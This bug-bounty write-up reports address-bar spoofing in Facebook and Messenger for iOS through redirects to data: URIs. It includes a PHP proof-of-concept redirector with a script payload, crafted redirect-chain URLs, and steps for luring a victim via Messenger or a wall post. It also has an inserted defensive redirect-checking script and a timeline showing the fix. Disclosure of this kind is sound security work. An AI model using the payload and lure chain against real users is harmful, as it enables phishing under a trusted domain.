
FB & Messenger for iOS : Address Bar spoofing using data uri

Summary: Facebook & Messenger for iOS were vulnerable to address bar spoofing, which could be reproduced by navigating from the target domain to the attacker's domain.

The attacker's domain was able to set the location to data:text/html,<script>…</script> using the Location header, so the script was executed in that context while the target domain remained in the URL bar.


Steps to reproduce:

Setup:   
FBiOS: 229.0  
MessengerForiOS: 223.0  
Device: iPhone 6s  
OS: 12.3.1
  • create a php file with the below code snippet:

    <?php
    // PoC redirector: answers every request with a 302 whose Location is a
    // data: URI; the in-app browser followed it and rendered the script output
    // while keeping the previous (target) domain in the address bar.
    header("Location: data:text/html,<script>document.write('<h1>Rahul Kankrale: URL spoofing using Data Uri</h1>')</script>");
    ?>

and save/host it on a server.

  • To spoof the Facebook domain, chain the exploit URL like below:
    https://www.google.com/url?q=https%3A%2F%2Fmbasic.facebook.com%2Fmessagingconfirmation%3Faction_url%3Dhttps%3A%2F%2Fyourmain%2Fexploit.php

    or, to spoof the Google domain:

    https://www.google.com/url?q=https%3A%2F%2Fyourmain%2Fexploit.php

  • Send one of those crafted URLs to the victim through Messenger or post it on a Facebook wall. When the victim opens the Google redirect page and taps the redirecting URL (for the Facebook PoC: when the message-delete page opens and the victim taps the delete button), the address bar shows the target domain with SSL while the content is generated by the data URI.
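As an added, defender-side example (not part of the original post): the check an in-app browser, proxy or redirect-chain scanner can apply to each Location header so that a top-level redirect to a data: or javascript: URI is never followed, and therefore never rendered under the previous page's address. The hostnames www.example.org and attacker.example, the /redirector path and the response table are constructed stand-ins for the chain above, not real endpoints.

```python
from urllib.parse import urljoin, urlsplit

# Schemes that must never be the target of a top-level redirect: the
# resulting page has no origin of its own, so a UI that keeps the previous
# URL in the address bar ends up showing attacker content under the
# victim site's name (the behaviour described in the post).
BLOCKED_REDIRECT_SCHEMES = {"data", "javascript", "blob", "file", "about"}
ALLOWED_REDIRECT_SCHEMES = {"http", "https"}


def classify_redirect(base_url, location_header):
    """Resolve a Location header against the URL that produced it and
    decide whether a webview/proxy should follow it.

    Returns (allowed, resolved_url, reason).
    """
    # Location values may carry surrounding whitespace; strip it before
    # parsing so "  data:text/html,..." is not misread as a relative path.
    target = location_header.strip()
    if not target:
        return False, "", "empty Location header"

    # Relative redirects are resolved against the base; absolute ones
    # (including data:/javascript:) pass through urljoin unchanged.
    resolved = urljoin(base_url, target)
    scheme = urlsplit(resolved).scheme.lower()  # "DATA:" is caught too
    if scheme in BLOCKED_REDIRECT_SCHEMES:
        return False, resolved, f"redirect to {scheme}: URI blocked"
    if scheme not in ALLOWED_REDIRECT_SCHEMES:
        return False, resolved, f"unsupported scheme {scheme!r}"
    return True, resolved, "ok"


def follow_redirects(start_url, responses, max_hops=10):
    """Walk a redirect chain given a {url: Location header} table, which
    stands in for live HTTP responses.

    Returns (hops, final_url, verdict). `final_url` is the URL that the
    address bar is allowed to show, i.e. the last hop that was actually
    followed; a blocked hop ends the walk without being rendered.
    """
    hops = [start_url]
    current = start_url
    for _ in range(max_hops):
        location = responses.get(current)
        if location is None:
            return hops, current, "ok"  # no redirect: this URL is rendered
        allowed, resolved, reason = classify_redirect(current, location)
        if not allowed:
            return hops, current, f"blocked: {reason}"
        hops.append(resolved)
        current = resolved
    return hops, current, "too many redirects"


# Constructed sample chain (hypothetical hosts): a redirector page hands
# off to an attacker-controlled script, which answers with a data: URI.
START = "https://www.example.org/redirector?q=https://attacker.example/exploit.php"
SAMPLE_RESPONSES = {
    START: "https://attacker.example/exploit.php",
    "https://attacker.example/exploit.php":
        "data:text/html,<script>document.write('spoofed')</script>",
}

if __name__ == "__main__":
    hops, final_url, verdict = follow_redirects(START, SAMPLE_RESPONSES)
    for hop in hops:
        print("followed:", hop)
    print("address bar may show:", final_url)
    print("verdict:", verdict)
```

The walk stops at the attacker's HTTPS page and reports the data: hop as blocked, so nothing is ever rendered under an address that was not itself loaded; a scanner run over proxied responses can apply the same `classify_redirect` check and alert on any blocked hop.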

Proof of concept:

Timeline:

  • 14/07/2019: Reported to Facebook bugbounty.
  • 16/07/2019: Pre-Triaged
  • 19/08/2019: Triaged
  • 30/09/2019: Fixed in FB
  • 29/10/2019: Rewarded $1500 for FB(iOS) issue
  • 22/01/2020: Fixed & Rewarded $1500 for Messenger(iOS) issue

Thanks

This post is licensed under CC BY 4.0 by the author.